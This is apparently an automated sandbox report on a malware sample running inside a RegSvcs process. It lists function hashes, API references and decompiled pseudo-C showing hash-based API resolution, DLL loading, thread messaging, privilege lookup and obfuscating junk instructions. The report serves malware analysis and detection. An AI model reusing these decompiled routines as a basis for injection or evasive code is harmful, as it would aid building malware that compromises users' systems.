Opcode Fuzzy Hash: e996f5de2109fa9ce04162c5e50e1914f99b840143f1721ae27a51b56ce327b5
Instruction Fuzzy Hash: 2D90027130140402D6006169491470B004597D0342F51C021A1154555D86658C91B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A89A5A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33767c11b6280b57a4d3e84bb82304136f040e130fc6759a001e915b6e0cc9e5
Instruction ID: 683a018830340efd2a1320f44acf356e90ed23ad95dfc89f8dbd3dddbeb07688
Opcode Fuzzy Hash: 33767c11b6280b57a4d3e84bb82304136f040e130fc6759a001e915b6e0cc9e5
Instruction Fuzzy Hash: B890026131180042D70065794D14B07004597D0343F51C125A0144554CC9558CA1A571

Uniqueness

Uniqueness Score: -1.00%

Function 00A895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A895DA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3615a8f8d4edde04df40eff9a2b98592f5e9e7ee54827323e083342ff40c4e95
Instruction ID: ac0680068175d574ea79f02cb009d61940e35415858badfdcaff76bbdac02fd0
Opcode Fuzzy Hash: 3615a8f8d4edde04df40eff9a2b98592f5e9e7ee54827323e083342ff40c4e95
Instruction Fuzzy Hash: FD9002A130200003460571694514616404A97E0341B51C031E1004590DC5658CD1B175

Uniqueness

Uniqueness Score: -1.00%

Function 00A89540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8954A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed5c40fdcbf36d83391f7c98cef537c6156ded7a5a8489b54e41ab1c21204c95
Instruction ID: 07f0d863dd1c52538c5d3706fd1017d8bb4cc4c486712037cf110780ab9d0e1d
Opcode Fuzzy Hash: ed5c40fdcbf36d83391f7c98cef537c6156ded7a5a8489b54e41ab1c21204c95
Instruction Fuzzy Hash: 97900265311000030605A5690704507008697D5391351C031F1005550CD6618CA1A171

Uniqueness

Uniqueness Score: -1.00%

Function 00A896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A896EA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6819728a245f6f26aca5f5be32554b29f6dbb8647d19578adfc91564519ba6cf
Instruction ID: b0026ce7d72444cb1b8b430b4d4745db274190c0b7ee9290a164bf4c0274b197
Opcode Fuzzy Hash: 6819728a245f6f26aca5f5be32554b29f6dbb8647d19578adfc91564519ba6cf
Instruction Fuzzy Hash: 9D90027130108802D6106169850474A004597D0341F55C421A4414658D86D58CD1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8966A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79e6972c4e004fdebf22b1cb4ef67fa5203cde9d41da84c2ab3b56bf7ae5bb19
Instruction ID: 7251d420e85d723e2a3812afd0bce6517aa05e1e223d3c3c76603c3bc08ce5c7
Opcode Fuzzy Hash: 79e6972c4e004fdebf22b1cb4ef67fa5203cde9d41da84c2ab3b56bf7ae5bb19
Instruction Fuzzy Hash: 9B90027130100802D6807169450464A004597D1341F91C025A0015654DCA558E99B7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A897A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A897AA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24caf63bae7151d1fd076eace1e65fb82574dab346107e66ae44f8bc30fe3d88
Instruction ID: d417869b9dfa730223c638fb416c8e0218241dea6d43f2b89058ac150fa14130
Opcode Fuzzy Hash: 24caf63bae7151d1fd076eace1e65fb82574dab346107e66ae44f8bc30fe3d88
Instruction Fuzzy Hash: 2D90026130100003D640716955186064045E7E1341F51D021E0404554CD9558C96A272

Uniqueness

Uniqueness Score: -1.00%

Function 00A89780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8978A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e473a399fe30fc3f79f015f328b322f963bae211618df186638219a25a9ca4b
Instruction ID: 08059f86e65298170d5d7ccf50a940c93824e6201ab94f563ca6311cff413591
Opcode Fuzzy Hash: 7e473a399fe30fc3f79f015f328b322f963bae211618df186638219a25a9ca4b
Instruction Fuzzy Hash: 8B90026931300002D6807169550860A004597D1342F91D425A0005558CC9558CA9A371

Uniqueness

Uniqueness Score: -1.00%

Function 00A89FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A89FEA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8ab589451097457cfacdd227d345e84b78549ddaaf87b09bb82204f09f698a1
Instruction ID: 671b30d46d0c5113e99f9638956272dc4ae423882e851d14c02974fa06890987
Opcode Fuzzy Hash: f8ab589451097457cfacdd227d345e84b78549ddaaf87b09bb82204f09f698a1
Instruction Fuzzy Hash: 8B90027131114402D61061698504706004597D1341F51C421A0814558D86D58CD1B172

Uniqueness

Uniqueness Score: -1.00%

Function 00A89710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8971A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a4d1578453bf64b6fc2d64273b1dbdf4c969f7ef3e5abefb354806bb3f28cd4
Instruction ID: f6bc610a2baec8bb1f7083f264fc1e488284b84f35f82e848a52a97a1d8e1cd1
Opcode Fuzzy Hash: 0a4d1578453bf64b6fc2d64273b1dbdf4c969f7ef3e5abefb354806bb3f28cd4
Instruction Fuzzy Hash: 5590027130100402D60065A95508646004597E0341F51D021A5014555EC6A58CD1B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
0x004089b5
0x004089ba
0x004089c7
0x004088f6
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407303 Relevance: 1.7, APIs: 1, Instructions: 188
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00407303(void* __edx, void* __edi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v656;
				intOrPtr _v668;
				char _v688;
				intOrPtr _v692;
				void* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t74;
				void* _t81;
				void* _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t110;
				intOrPtr _t115;
				void* _t124;
				void* _t126;
				void* _t133;

				_push(_t124);
				asm("o16 loope 0xffa8");
				asm("in al, dx");
				asm("int 0xb7");
				_t110 = __edi + 1;
				asm("jecxz 0xffffff9c");
				asm("sbb byte [esi-0x7e1374ab], 0xec");
				_push(_t110);
				_v12 = 0;
				_v692 = 0;
				E0041A140( &_v688, 0, 0x2a4);
				_t115 = _a12;
				_t111 = _v0;
				E00407280(_v0, _t133, _v0,  *((intOrPtr*)(_t115 + 0x300))); // executed
				_t126 = _t124 - 0x2ac + 0x14;
				_t60 = E004199D0( *((intOrPtr*)(_t115 + 0x300)));
				_t9 =  *((intOrPtr*)(_t115 + 0x2d4)) + 0x29000; // 0x29000
				_t85 = _t60 + _t9;
				_a12 = 0;
				while(1) {
					E0040D3D0(_t111, 0xfe363c80); // executed
					_t63 = E00418780(_t111,  *((intOrPtr*)(_t115 + 0x2f4)), _t85,  &_v688, 0x2a8, 0); // executed
					_t126 = _t126 + 0x20;
					 *((intOrPtr*)(_t115 + 0x2dc)) = _t63;
					if(_t63 < 0) {
						break;
					}
					if(_v656 == 0 || _v668 == 0 || _v136 == 0 || _v132 == 0) {
						_t66 = _a16 + 1;
						_a16 = _t66;
						if(_t66 < 2) {
							continue;
						} else {
							_t87 = _v8;
							goto L11;
						}
					} else {
						_t87 = 1;
						E0041A0C0(_a12,  &_v688, 0x2a8);
						_t126 = _t126 + 0xc;
						L11:
						E00418710(_t111,  *((intOrPtr*)(_t115 + 0x2f4)));
						if(_t87 == 0) {
							break;
						} else {
							 *((intOrPtr*)(_a12 + 0x14)) = _v668;
							_t29 = _t115 + 0x2e8; // 0x2e8
							 *_t29 = _v136;
							_t31 = _t115 + 0x314; // 0x314
							_t88 = _t31;
							 *_t88 = 0x18;
							 *((intOrPtr*)(_t115 + 0x318)) = 0;
							 *((intOrPtr*)(_t115 + 0x320)) = 0;
							 *((intOrPtr*)(_t115 + 0x31c)) = 0;
							 *((intOrPtr*)(_t115 + 0x324)) = 0;
							 *((intOrPtr*)(_t115 + 0x328)) = 0;
							_t72 = E00417F90(_t111, _a12 + 0x220,  *((intOrPtr*)(_t115 + 0x2d0)), _t88, _t29);
							 *((intOrPtr*)(_t115 + 0x2dc)) = _t72;
							if(_t72 < 0) {
								break;
							} else {
								_t39 = _t115 + 0x2e0; // 0x2e0
								 *((intOrPtr*)(_t115 + 0x318)) = 0;
								 *((intOrPtr*)(_t115 + 0x320)) = 0;
								 *((intOrPtr*)(_t115 + 0x31c)) = 0;
								 *((intOrPtr*)(_t115 + 0x324)) = 0;
								 *((intOrPtr*)(_t115 + 0x328)) = 0;
								_t98 = _a12 + 0x224;
								 *((intOrPtr*)(_t115 + 0x2e4)) = _v132;
								 *_t88 = 0x18;
								 *((intOrPtr*)(_t115 + 0x2d0)) = 0x1a;
								_t74 = E00417FD0(_t111, _a12 + 0x224, 0x1a, _t88, _t39);
								 *((intOrPtr*)(_t115 + 0x2dc)) = _t74;
								if(_t74 < 0) {
									break;
								} else {
									_t54 = E0041A3B0( *((intOrPtr*)(E00419690(0, E00419670(_t98)) + 0x28))) + 2; // 0x2
									E0041A0C0( *((intOrPtr*)(_a8 + 0x10)) + 0x200,  *((intOrPtr*)(_t76 + 0x28)), _t78 + _t54);
									_t81 = E00413A50(_t111,  &_v656, 2, 0); // executed
									return _t81;
								}
							}
						}
					}
					L15:
				}
				__eflags = 0;
				return 0;
				goto L15;
			}

0x00407303
0x00407305
0x00407308
0x00407309
0x0040730b
0x0040730c
0x0040730e
0x0040731b
0x00407324
0x00407327
0x00407334
0x00407339
0x00407342
0x00407347
0x0040734c
0x0040734f
0x0040735a
0x0040735a
0x00407361
0x00407370
0x00407376
0x00407392
0x00407397
0x0040739a
0x004073a2
0x00000000
0x00000000
0x004073ac
0x004073c9
0x004073ca
0x004073d0
0x00000000
0x004073d2
0x004073d2
0x00000000
0x004073d2
0x004073e0
0x004073f0
0x004073f5
0x004073fa
0x004073fd
0x00407405
0x0040740f
0x00000000
0x00407411
0x00407420
0x00407429
0x00407430
0x00407435
0x00407435
0x00407446
0x0040744c
0x00407452
0x00407458
0x0040745e
0x00407464
0x0040746a
0x00407474
0x0040747c
0x00000000
0x00407482
0x00407485
0x0040748c
0x00407492
0x00407498
0x0040749e
0x004074a4
0x004074b0
0x004074b8
0x004074be
0x004074c4
0x004074ce
0x004074d6
0x004074de
0x00000000
0x004074e4
0x0040750b
0x00407512
0x00407523
0x00407531
0x00407531
0x004074de
0x0040747c
0x0040740f
0x00000000
0x004073ac
0x004073d9
0x004073df
0x00000000

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2d1de907f296978305212b98e80a18241c328c742f94eac5f88b5ec578c39959
Instruction ID: 65a023dbb94bd0af3290541542e0d7a1f6a1bded16b2ea683d7464b2fb560532
Opcode Fuzzy Hash: 2d1de907f296978305212b98e80a18241c328c742f94eac5f88b5ec578c39959
Instruction Fuzzy Hash: 2F61E570904305AFD725DF24DC85FEBB7A8EB45304F10446EF949A7281D778BA41CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E00407280(void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_push(0);
					_push(0);
					_push(0x111);
					 *_t13 =  *_t13 + _t13;
					_t14 = PostThreadMessageW(_t21, ??, ??, ??); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072d0
0x004072d2
0x004072d4
0x004072d7
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00409B33 Relevance: 1.5, APIs: 1, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00409B33(void* __edx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v540;
				void* _t16;
				struct _OBJDIR_INFORMATION _t18;
				struct _OBJDIR_INFORMATION _t19;
				void* _t38;
				void* _t40;
				void* _t41;

				asm("aaa");
				asm("loop 0x48");
				asm("sbb ch, [ebp+0xe]");
				ss =  *((intOrPtr*)(__edx - 0x16));
				_push(_t34);
				_v12 =  &_v540;
				_t16 = E0041AF70( &_v16, 0x104, _a4);
				_t40 = _t38 - 0x214 + 0xc;
				if(_t16 != 0) {
					_t18 = E0041B390(__eflags, _v8);
					_t41 = _t40 + 4;
					__eflags = _t18;
					if(_t18 != 0) {
						E0041B610( &_v12, 0);
						_t41 = _t41 + 8;
					}
					_t19 = E00419720(_v8);
					_v16 = _t19;
					__eflags = _t19;
					if(_t19 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						_t19 = _v16;
					}
					return _t19;
				} else {
					return _t16;
				}
			}

0x00409b33
0x00409b35
0x00409b39
0x00409b3c
0x00409b40
0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00409bb4
0x00409bb4
0x00409bba
0x00409b6b
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a995591dc99b78b86d9432d14c72b8eeb7d3ec645dbef0f31d5dbad7bbd6d41e
Instruction ID: 203885ea8379677dc845b81ffde3e7c974307e402c0c8ffbc5563949e6948524
Opcode Fuzzy Hash: a995591dc99b78b86d9432d14c72b8eeb7d3ec645dbef0f31d5dbad7bbd6d41e
Instruction Fuzzy Hash: 8C0152B5E0010DBBDF10DBA5E842FDEB778AF54718F0041A6E908AB2C1F635AB44C795

Uniqueness

Uniqueness Score: -1.00%

Function 00407253 Relevance: 1.5, APIs: 1, Instructions: 26
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00407253(signed int __eax, signed int __edx) {
				signed char _t6;
				int _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				long _t18;
				intOrPtr* _t20;
				void* _t24;

				asm("std");
				_t6 = __eax ^ 0x00000099;
				if(__edx << 0x54 > 0) {
					 *_t6 =  *_t6 + _t6;
					_t7 = PostThreadMessageW(_t18, ??, ??, ??); // executed
					__eflags = _t7;
					if(__eflags == 0) {
						_t7 =  *_t20(_t18, 0x8003, _t24 + (E004092A0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t7);
					}
					return _t7;
				} else {
					_push(_t20);
					_t10 = E00419B20(_t6, _t13, _t14, 0x11c6f95e);
					return E004199D0(_t14) + _t10 + 0x1000;
				}
			}

0x00407253
0x00407254
0x00407259
0x004072d7
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00407302
0x0040725b
0x00407260
0x00407266
0x0040727d
0x0040727d

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: af0e2bb297519db8b850e2f22e7d87cea076aaf6a8b30ab4f120fb49dfd17d14
Instruction ID: b62544a0017f7928eaedfa31551f1a057952c7296c23de4c0d18afd07483793c
Opcode Fuzzy Hash: af0e2bb297519db8b850e2f22e7d87cea076aaf6a8b30ab4f120fb49dfd17d14
Instruction Fuzzy Hash: FDE0C256A8421936E61111946C02EBE36189B92B56F0000FFFE08E82C3EA5E5C1DA2F3

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a6a
0x00418a80
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418930 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}
